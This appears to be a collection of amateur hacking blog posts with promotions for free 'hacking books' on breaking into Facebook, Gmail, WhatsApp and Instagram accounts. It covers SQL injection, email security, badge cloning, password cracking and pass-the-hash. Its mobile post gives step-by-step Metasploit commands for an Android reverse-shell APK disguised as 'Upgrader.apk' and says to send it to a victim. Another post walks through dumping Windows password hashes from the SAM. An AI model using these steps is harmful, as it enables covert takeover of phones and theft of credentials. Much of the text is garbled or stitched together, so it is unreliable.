The Best Hacking Books

Most Power Full and Read Able Books which I personaly Read and All Books Very help full.

Intelligence Hacking Book

most intelligence hacking book with free downloadable links So read here and Download Thanks For coming.

Bitcoins Earning and Hack

Top Bitcoin Books How To Earn Bitcoin Free How to hack Bitcoins Fast Free How to Get Bitcoin

Hackers and Social Media Hacks

most importent books for every one like Faceook,Gmai,Whatsapp and instagram hacking books with free Download link All Questions with answer How to hack Facebook? How to hack Gmail? How to hack Whatsapp? How to hack Instagram?

Udemy Course

I am Upload Udemy Course list With Free Download and Easy to Download Please Share links with Your Friends.This Page Only for Educational Purpose Don't Missuse This Files.....

Sunday, January 26, 2020

Advance SQL

Same Peoples Says me that tech advance SQL Injection So Today we learn 
Advance SQL Injection 

(This is only education purpose )
What is SQL Injection attack?
SQL Injection Attacks uses SQL websites or web applications. It relies on the strategic injection of malicious code or script into existing queries. 
SQL injection is a powerful and dangerous attack. It identifies the flaws and vulnerabilities in a website or application. 

Advanced SQL 
Injection Advanced SQL injection may include an enumeration of databases like MySQL, MSSQL, MS Access, Oracle, DB2, or Postgre SQL, tables and column in order to identify privilege level of users, account information of database administrator and database structure disclosure. it also includes passwords and hashes grabbing, and transferring the database to the remote machine. 

The scope of SQL Injection Attack

 SQL injection impact can be measured by observing the following parameters that an attacker is intended to overcome: 
 Bypassing the Authentication 
 Revealing sensitive information 
 Compromised Data integrity 
 Erasing the database 
 Remote Code Execution

Types of SQL Injection Attack:
  • In-band SQLi 
  • Inferential SQLi
  • Out-of-band SQLi 


Launch SQL Injection Attacks 
Appropriate SQL injection attack from the category cab be initiate just after gathering the information about the structure of database and vulnerabilities found. By exploiting them, the injection can be successful. SQL injection attacks such as Union SQL injection, Error-based SQL injection, Blind SQL injection and other can be used to extract information from the database such as extracting Database name, tables, columns, rows, and fields. The injection can also have intended for bypassing the authentication. 

 IBM Security AppScan Standard 


Click On Create New Scan
Select Scan template  demo.testfire.net
 Click Next 

Select Login Method
Select Test Policy and Click Next
Here You Select how do you want to start the scan. 
Click Finish
Here we are using a demo testing; it does not find any issue.


 If it found the issue, Issue section will show the detected issues list. To explore, click the security issue, it will show the details.

Task section will show the recommended remediation actions.





Saturday, January 25, 2020

Email Security

Email Security

Everyone uses e-mail.  It is the second most used application on the internet next to your web browser.  But what you might not realize is that a significant portion of network attacks and compromises originate through e-mail

How E-mail Works?

We know that E-mail like as airmail is sent through the air, 'e'-mail is sent through the 'e' – the 'e' in this case being the web of electronic connections within and between the networks that make up the Internet. When you send an e-mail from your computer, the data is sent from your computer to an SMTP server. The SMTP server then searches for the correct POP3 server and sends your e-mail to that server, where it waits until your intended recipient retrieves it.
E-mail accounts are available through many different sources. You may get one through school, through your work or through your ISP. When you get an e-mail account, you will be given a two part e-mail address, in this form: username@domain.name. The first part, username identifies you on your network, differentiating you from all the other users on the network. The second part, domain.name is used to identify your specific network.

 POP and SMTP

Your incoming e-mails are going to be on a computer called a POP server. 
Your outgoing e-mails will be sent to a computer called a SMTP server. 

 Web Mail 
A second option for e-mail is to use a web based e-mail account. This will allow you to use a web browser to check your e-mail. Since the e-mail for these accounts is normally stored on the web e-mail server – not on your local computer –  it is very convenient to use these services from multiple computers. It is possible that your ISP will allow you to access your e-mail through both POP and the web. 
Safe E-mail Usage : 1
Receiving 
Everyone uses e-mail, and to the surprise of many people, your e-mail can be used against you.  E-mail should be treated as a post card, in that anyone who looks can read the contents.  You should never put anything in an ordinary e-mail that you don’t want to be read. 

  • Attachment Security(Most Important )
Another real concern related to received e-mail security is attachments.  Attackers can send you malware, viruses, Trojan horses and all sorts of nasty programs.  The best defense against e-mail borne malware is to not open anything from anyone you don’t know.   Never open a file with the extension .exe or .scr, as these are extensions that will launch an executable file that may infect your computer with a virus.  For good measure, any files you receive should be saved to your hard drive and scanned with an antivirus program.  Beware of files that look like a well known file type, such as a zip file.  Sometimes attackers can disguise a file by changing the icon or hiding the file extension so you don’t know it is an executable.



  • Spam, Phishing and Fraud 

Everybody likes to get e-mail. A long time ago, in a galaxy far far away it used to be you only got mail from people you knew, and it was about things you cared about. Now you get email from people you never heard of asking you to buy software, drugs, and real estate, not to mention help them get 24 million dollars out of Nigeria. This type of unsolicited advertising is called spam.  It comes as a surprise to many people that e-mail they receive can provide a lot of information to a sender, such as when the mail was opened and how many times it was read, if it was forwarded, etc.


  •  HTML E-Mail 

One of the security concerns with HTML based e-mail is the use of web bugs.  Web bugs are hidden images in your e-mail that link to the senders’ web server, and can provide them with notification that you have received or opened the mail. 
Safe E-mail Usage:2
Sending
Sending mail is a little more care free.  There are some things you can do to make sure your conversation is secure though.  The first is to ensure your connection is secure (see section 9.4 Connection Security for more information). 

 Digital Certificates 
A digital certificate is unique to an individual, kind of like a drivers license or passport, and is composed of 2 parts.  These parts are a public and private key.  The certificate is unique to one person, and typically certificates are issued by a trusted Certificate Authority, or CA.

 Digital Signatures 
A digital signature is generated by your e-mail software and your private key to assure the authenticity of your e-mail.  The purpose of the signature is twofold.  The first is to certify it came from you.  This is called non-repudiation.  The second is to ensure the contents have not been altered.  This is called data integrity.

Encryption 
As an additional layer of security, you can encrypt your e-mail. Encryption will turn your e-mail text into a garbled mess of numbers and letters that can only be read by its intended recipient. Your deepest secrets and your worst poetry will be hidden from all but the most trusted eyes.  
Encryption is fairly complicated, so I’ll try to explain it in a low tech way: Jason wants to send an encrypted message.  So the first thing Jason does is go to a Certificate Authority and get a Digital Certificate.  This Certificate has two parts, a Public Key and a Private Key.  If Jason wants to receive and send encrypted messages with his friend Ali, they must first exchange Public keys. If you retrieve a public key from a Certificate Authority that you have chosen to trust, the key can be verified back to that certifying authority automatically.  That means your e-mail program will verify that the certificate is valid, and has not been revoked. If the certificate did not come from an authority you trust, or is a PGP key, then you need to verify the key fingerprint.  Typically this is done separately, by either a face to face exchange of the key or fingerprint data.

 Decryption 
So Ali has received an encrypted message from Jason.  This typically is indicated by a lock Icon on the message in her in box.  The process of decryption is handled by the e-mail software, but what goes on behind the scenes is something.

 Connection Security 
Last but not least is connection security.  For web mail, ensure you are using an SSL connection to your ISPs e-mail.  A small lock icon will appear in the bar at the bottom of your browser.  If you are using POP and an e-mail client, ensure that you have configured your email client to use SSL with POP on port 995 and SMTP on port 465.   This encrypts your mail from you to your server, as well as protecting your POP / SMTP username and password.  Your ISP should have a how-to on their web site to configure this.  If they don’t offer a secure POP / SMTP connection, change ISPs!

Friday, January 24, 2020

Advance Physical tools

Today we see same(two) advance Physical Tools to perform SE attack 


  • Card Reader Cloners 

Image result for proxmark3

Card reader cloners were heavily covered in THP2, so I will
mainly go into updates. For the most part, HID badges that don’t require any public/private handshakes are still vulnerable to clone and brute-force ID numbers.
In THP2, we loved cloning ProxCard II badges as they don’t have any protections, can be cloned easily, and cards are generally purchased in bulk incrementally, which allow for easy brute-forcing. This was all done using the Proxmark3 device. Since then, a much more portable version of this device has been released called Proxmark3 RDV2 Kit 
This version can be configured wit a battery and is much smaller than the original Proxmark3.

Other common cards :
HID iClass (13.56 MHz)
MIFARE Classic (13.56 MHz)
HID ProxCard (125 kHz)
EM4100x (125 kHz)


  • Packet Squirrel 
Image result for Packet Squirrel

Another tool from Hak5 that has similar features as the LAN Turtle is the Packet Squirrel. The Packet Squirrel requires a USB micro to be powered, but instead of one end being a USB Ethernet adaptor, on the Packet Squirrel, both end are Ethernet cables. This is another discrete way to either capture traffic or create a VPN connection.

Similar to the LAN Turtle for configuring the Packet Squirrel:

Edit the /root/payloads/switch3/payload.sh
 FOR_CLIENTS=1

Edit /etc/config/firewall 
Make the exact same Firewall changes you did for the LAN Turtle
Upload the LANTurtle.ovpn file to /root/payloads/switch3/config.ovpn


Thursday, January 23, 2020

Exploiting a Mobile Device

Exploiting a Mobile Device


How To Write Your First Exploit????
A known toolkit for exploiting computers is Kali Linux , is also one of the most efficient tools to perform a hack on a mobile device. Simply follow these steps to perform a remote hack on a mobile device and install a malicious file on a targeted device.


  •  Open Kali Linux

 Type the following command in terminal:
root@kali:-# msfpayload android/meterpreter/reverse_tcp LHOST=[your device’s IP address] R > /root/Upgrader.apk


  • Now open a new terminal 

While Kali is creating your file, load another terminal and load the metasploit console.
enter the command: 
root@kali:-# Msfconsole

Now set up the listener
Once metasploit is up, load the multi-handler exploit by entering the command: 
root@kali:-# use exploit/multi/handler



  •  Create the reverse

Afterward, create the reverse payload by typing the following command: 
root@kali:-# set payload android/meterpreter/reverse_tcp 
Next, you will need to set up the Local host type in order for you to start receiving traffic. To do that, type the following command: 
root@kali:-#  set LHOST [Your device’s IP address]


  •  Start Exploit 

Now that you have your listener ready, you can now start your exploit by activating your listener. To do this, type the command: root@kali:-# exploit

If the malicious file that you have created a while ago is ready, copy it from the root folder to your mobile device, preferably an android phone. Afterwards, make that file available by uploading it on any file-sharing site such as speedyshare or Dropbox. Send the link to your target/victim, and ask him to install the app on her/him mobile.

Once your target user has installed the file, you can now receive the traffic that he is receiving through his mobile device!


If you are using Termux So first install Metasploit And follow this steps 


Thanks For  reading "If any problem please comment" 


Wednesday, January 22, 2020

Introduction to Mobile Hacking

 Mobile Hacking 

Mobile hacking makes perfect sense because of the rise of smartphone and other mobile devices for online transactions and connecting with others. Since mobile devices are hubs of personal information that are easier to access compared to personal computers, they are among the most vulnerable devices for hackers.

Most Common Question (Why should you hack mobile devices?)


  • Know the location of a target through installed GPS service or cell ID tracking
  • Get Access emails and record phone conversations 
  • Know target’s internet browsing behavior 
  • To View all contents stored in the device, including photos 
  • Send remote instructions to the mobile device 
  • Use it to send spoofed messages or calls


Mobile app hacking is among the fastest ways to infiltrate a mobile device system since it is easy to upload a malicious app online and make it possible for people to download the hack, without even thinking if they should examine their download or not. Mobile apps are also considered as “low-hanging fruit.” Most mobile apps can be directly accessed through their binary codes, or the code that mobile devices need in order to execute the app. That means that that everyone who has their hands on to marketed hacking tools are able to exploit available mobile apps and turn them into hacking tools. Once hackers are able to compromise a mobile app, they will be able to perform the initial compromise within minutes.


How hackers exploit binary codes in mobile apps?
Here Same Ways......

  • Modify the code to modify behavior

When hackers modify the binary code, they do that to disable the app’s security controls, requirements for purchasing, or prompts for ads to display. 


  • Inject malicious code

When hackers are able to get their hands on a binary code, they can inject a malicious code in it and then distribute it as an app update or a patch. Doing this can confuse a user into thinking that he is merely updating the app in his mobile devise, but in reality, the hacker has engineered the user into installing an entirely different app.


  1.  Create a rogue app

Hackers can perform a drive-by attack, which is possible by doing an API/function hooking or swizzling. When this is done, the hacker will be able to successfully compromise the targeted application and make redirecting the traffic or stealing user credentials possible.




  • Do reverse engineering

A hacker that has access to a binary code can easily perform a reverse-engineering hack to expose further vulnerabilities, do similar counterfeit apps, or even resubmit it under new branding.













Tuesday, January 21, 2020

Physical Access Attacks Hacking

 Physical Access Attacks

If an attacker is able to gain physical access to a machine, chances are that he'll hack it. In almost every OS or network device, there exists a “physical backdoor” which allows for manual resetting of a device configuration.
"Technologies used for perimeter security involve, for instance, intrusion detection sensors and alarm systems. In the context of cryptographic implementations, “physical attack” is understood as a term which encompasses all attacks based on physical means against cryptographic devices."

First we see  Resetting Microsoft Windows 

 Resetting Microsoft Windows 
As discussed before, Windows stores local user passwords in the SAM. The SAM is locked by Windows and can not be accessed, copied or read while Windows is running. However, if we were to boot the same computer with a different OS (say Linux), then the SAM file would no longer be protected. Our newly booted Linux OS would see the SAM file as just another file on the Windows files system. We can then modify the SAM with specialized tools and reset passwords to our liking. Once the Windows machine boots back up, it will have new passwords in its SAM database.

Here we see that the Windows NTFS partition SDA1 is mounted, with read only (ro) permissions. Since we need to change the SAM file, we will require read / write permissions


BT ~ # umount /mnt/sda1/ 
BT ~ # modprobe fuse 
BT ~ # ntfsmount /dev/sda1 /mnt/sda1/ 
BT ~ # mount 
tmpfs on / type tmpfs (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) usbfs on /proc/bus/usb type usbfs (rw) /dev/sda1 on /mnt/sda1 type fuse (rw,nosuid,nodev,default_permissions,allow_other) BT ~ #

Now we can dump the SAM file using BKHive and SAMdump

BT ~ # bkhive /mnt/sda1/WINNT/system32/config/system system.txt
Bkhive ncuomo@studenti.unina.it
Bootkey: dc155851060590ee807d3c660a437109 
BT ~ # samdump2 /mnt/sda1/WINNT/system32/config/sam system.txt >hashes.txt 
Samdump2 ncuomo@studenti.unina.it 
This product includes cryptographic software written by Eric Young (eay@cryptsoft.com)

No password for user Guest(501) 
BT ~ # cat Phashes.txt Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:::: NetShowServices:1001:4e239a9b2c8fca59049021d2a350c02c:021c54b8e10a4c420839b49a7cd21a66::: IUSR_WIN2KSP4:1003:76af34c719386a457aa40990e59dd60e:1c6560db5a2eb3f2da11bfd04d7c5a91::: IWAM_WIN2KSP4:1004:1cad3d74dee85109bb0b6cba129ef50e:7212a9f44e59a1b73d88fa7d670266db::: 


 we can modify the SAM using a use full tool such as chntpw:


Second Way is  Resetting a password on a Domain Controller

Resetting a password on a Domain Controller

Windows domain controllers do not store their user passwords in the local SAM, but in Active Directory. Active Directory can not be manually edited offline, so a different approach is taken. A Windows domain controller can be booted without Active Directory (Active Directory Restore Mode). This is usually done for Active Directory maintenance or defragmentation.  When Active Directory is not loaded, the domain controller will temporarily revert to local username authentication, and will once again use the SAM file present on the machine. A possible attack vector would be to reset/crack the Domain Controller's Local administrator password (By SAM manipulation or dumping) and then load it up in “Active directory restore mode” and log in with the modified / cracked password. Once logged in, a service is installed which executes the “net user” command (with SYSTEM privilages). Once the Domain Controller is rebooted and allowed to load Active Directory, the service adds/modifies the user and allows us to log in with our altered password

Third is Resetting a Cisco Device 

  Resetting a Cisco Device 

In Linux, a similar technique is used to reset root passwords. The machine is either booted in single mode or booted off a different operating system in order to manually change the /etc/shadow file.

Monday, January 20, 2020

Password Hash Attacks

Password Hash Attacks

Today our most topic which is Password Hash Attacks we read same tools So let start

What is Password Hashes?

A cryptographic hash function is a oneLway function implementing an algorithm that,  given an arbitrary block of data, returns a fixed-size bit string called a hash%value or  message%digest.  One of the most important uses of cryptographic hash functions is their  application in password verification. Most systems that use a password authentication mechanism need to store these passwords locally on the machine.  
 This is true for operating systems, network hardware, etc.  This means that during the authentication process, the password presented by the user  is hashed and compared with the previously stored message digest.  
what is Password Cracking  in cryptanalysis?
In cryptanalysis, password cracking is the process of recovering the clear text passphrase, given its stored hash. Once the hash type is known, a common approach to password cracking is to simulate the authentication process by repeatedly trying guesses for the password and comparing the newly-generated digest with a stolen or dumped hash.  
A list of common hashes that you can use for reference when trying to  identify a password hash can be found on the Openwall website. There are three main  hash properties you should pay attention to: 
1:- The length of the hash (each hash function has a specific output length).  
2:- The character-set used in the hash.  
3:- Any special characters that may be present in the hash 

Use of John the Ripper
Once you’ve retrieved password hashes from a target system, you will want to try cracking them so you can make use of the clear text values in further attacks. One of the  most popular tools for cracking passwords is John the Ripper.

Running john in brute-force mode is as simple as passing the filename containing your password hashes on the command line. Here we can pass the –wordlist parameter to john instead.

In order to crack Linux hashes with john, you will need to first use the unshadow utility to combine the passwd and shadow files from the compromised system.  


We can now take the unshadowed file and pass it to john as we normally would, and  crack the password hash.  

Use of  Rainbow Tables

The idea behind time memory tradeoff is to perform all cracking computation in advance and store the results in a binary database, or Rainbow%Table file. It takes a long time to pre-compute these tables, but once pre-computation is finished, a time-memory tradeoff cracker can be hundreds of times faster than a traditional brute-force cracker. To increase the difficulty in password cracking, passwords are often  concatenated with a random value before being hashed. This value is known as a salt,  and its value, which should be unique for each password, is stored together with the  hash in a database or a file to be used in the authentication process. The primary intent  of salting is to increase the infeasibility of Rainbow Table attacks that could otherwise  be used to greatly improve the efficiency of cracking the hashed password database. 

Passing the Hash in Windows

Cracking password hashes can be very time-consuming and it is often not feasible. A different approach of making use of dumped hashes without cracking them has been around since 1997. The technique, known as Pass-The-Hash (PTH), allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a clear text password
 Consider the following scenario: 
An organization uses disk-imaging technologies within its network, or otherwise has a local administrative user enabled on multiple computers. A vulnerability on one of these computers has provided us with SYSTEM privileges, through which we dumped local LM and NTLM hashes. We copy the local administrator NTLM hash and use this discovered hash instead of a password with a patched version of pth$winexe to gain a shell on a different machine, which has the same local administrator / password combination. 













Saturday, January 18, 2020

Online and Offline Password Attacks

Online Password Attacks

Online password attacks involve password guessing attempts for networked services that use a username and password authentication scheme.For this purpose which tools are use  Hydra, Medusa, Ncrack, and even Metasploit have built in handling of many network protocol authentication schemes.These three tools are probably the most popular for performing password security audits. They each have their strengths and weaknesses and can handle various protocols effectively.
  • Medusa


 Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer.
  • Ncrack


Ncrack is a high-speed network authentication cracking tool.The ncrack tool is one of the few tools that is able to brute-force the Windows RDP protocol reliably and quickly:
  • THC-Hydra


THC-Hydra is another powerful online password cracker under active development and is worth knowing well. It can be used to crack a variety of protocol authentication schemes including SNMP:
Hydra can also be used for brute-forcing SSH:


Password Attacks/Cracking

Password Attacks/Cracking

What is passwords?
A password, sometimes called a passcode, is a memorized secret used to confirm the identity of a user. Using the terminology of the NIST Digital Identity Guidelines, the secret is memorized by a party called the claimant while the party verifying the identity of the claimant is called the verifier.
Password Cracking....
(The theory!behind!password!attacks!is!simple!to!comprehend.)
In cryptanalysis and computer security, password cracking is the process of recovering passwords from data that have been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password and to check them against an available cryptographic hash of the password.

Types of Password Cracking

  • Dictionary Files 

Password “dictionary files” are usually text files that contain a large number of common passwords in them. These passwords are often used in conjunction with password cracking tools, which can accept these password files, then attempt to authenticate to a given service with the passwords contained in the password files.

In Kali Linux includes a number of these dictionary files in the following directory:

root/usr/share/wordlists/

  • Windows Credential Editor (WCE):


Windows Credentials Editor (WCE) 68 is a security tool that allows one to perform several attacks to obtain clear text passwords and hashes from   a compromised Windows host. Among other things, WCE can steal NTLM credentials from memory and dump cleartext passwords stored by Windows authentication packages installed on  the target system such as msv1_0.dll, kerberos.dll, and digest.dll. Itks quite interesting to note that WCE is able to steal credentials either by using DLL injection or by directly reading the LSASS processm emory. The second method is more secure in terms of operating system stability, as code is not being injected into a highly privileged process. 

  • Password Profiling


One way to customize our dictionary file and make it more potent against a specific target is by using password profiling techniques.This involves using words and phrases taken from the specific organization you are targeting and including them in  your wordlists with thaim of improving your chances of finding a valid password.
Using a tool like cewl, we can scrape the megacorpone.com webservers to generate a  password list from words found on the web pages.

 Cewl has retrieved the string “nanobots” from the megacorpone.com website and that  password is now present in a custom dictionary file, specific to megacorpone.com

Password Mutating

Users most commonly tend! to mutate! their passwords in various ways. This could include adding a few numbers at the end of the password, swapping out lowercase for capital letters changing certain letters to numbers, etc. We can now take our minimalistice password list generated by cewl&and add common mutation sequences to these passwords. A good tool for doing  this is John the Ripper. John comes with an extensive configuration file where password mutations can be defined.
Once the john.conf configuration file is updated, we mutate our dictionary containing  331 entries that were generated by cewl. The resulting file has minimum 50,000 passwords  entries due to the multiple mutations performed on the passwords, and one of the passwords is “nanobots93”.



To Be continue Like Online Password Attacks and Offline Password Attacks

Thanks For Reading



Friday, January 17, 2020

Web Application Vulnerabilities and Security

Web Application Vulnerabilities and security


SQL Injection
SQL stands for the structured query language. The SQL injection is an injection attack which gives an attacker the feasibility to inject or we can say to execute SQL statements which can directly communicate with the database of the web application also known as a relational database management system.

Cross Site Scripting (XSS)
The most common vulnerability is XSS. It also allows an attacker to inject the code but that code is which means javascript code into the page. XSS is a client-side vulnerability which allows an attacker to execute malicious scripts.
Same types are here: 
Persistent or Stored XSS
    In this type of XSS, the code gets stored in the database and is the most dangerous form of  XSS.
DOM Based XSS
    In this type of XSS, the code runs on the client machine without communicating with the web server.
Reflected XSS   In this type of XSS, the code only gets executed when the user runs some specific URL.
RFI
   RFI stands for Remote File Inclusion. It gives the attacker the ability to upload custom files on the server like viruses or payloads or shells. It can be used to easily deface a website.
LFI
   LFI stands for Local File Inclusion. LFI allows an attacker to view the files stored on a server. It allows an attacker to do the directory traversal and visit the sensitive files which one must not visit.
Most common vulnerabilities found in Web Application.
Other vulnerabilities are:
 Broken Authentication
DOS & DDos
Server Rooting
ClickJacking Attacks
Social Engineering
For Tempering
Remote Code Execution
DNS Cache Poisoning
HTML Injection
Security Misconfiguration
Secure WordPress Website
Keep Your Website and Plugin’s Update
The easy way is to keep your site secure update your WordPress Website Regularly base, So You will be website will be old vulnerability free .You can see on there is regularly bugs found in Plugins, themes, and WordPress, that’s why you need to update your plugins and themes to avoid the risk of security bug. 
Set Secure Password To Avoid 
Bruteforce Risk
Brute Force is a way to crack a password by guessing the password by script or tool, if you set easy password for example admin123 on admin@123 or 12345678, this password can be cracked in 1 minute using brute force software and other ways.
Chose a strong username and passwords for your admin penal, like this password: K@@shm!r++1 or 1@3$5%zZka or
lkfd@lkdj13...............
Choose a Good Hosting For Your Website
This is the best way to secure your website more secure by choosing a good hosting company who provides multiple layers of security.
Install a WordPress Security Plugin
There is a lot of Plugins Free and Paid You can choose any Security plugin for your WordPress website and keep your website secure, if you are running an e-commerce website then you need to use a paid plugin.
Disable File Editing
  1. Go on your dashboard then click on Appearance>Editor. Another way you can find the plugin editor is by going under Plugins>Editor.
Once your site is live we recommend that you disable this feature. If any hackers gain access to your WordPress admin panel,
To disable the ability to edit plugins and the theme file, simply paste the following code in your wp-config.php file.
Change your WP-login URL
Hide your WordPress admin URL to avoid the hacking risk of your website, the best way is to use admin hide plugin simple keep the secure and easy way to install the plugin and enter your new URL......
Limit Login Attempts
Click on Add plugin Search for login limit attempts and install it. After you’ve installed the plugin you can change the number of login attempts via Settings> Login Limit Attempts......

Hack Me Tech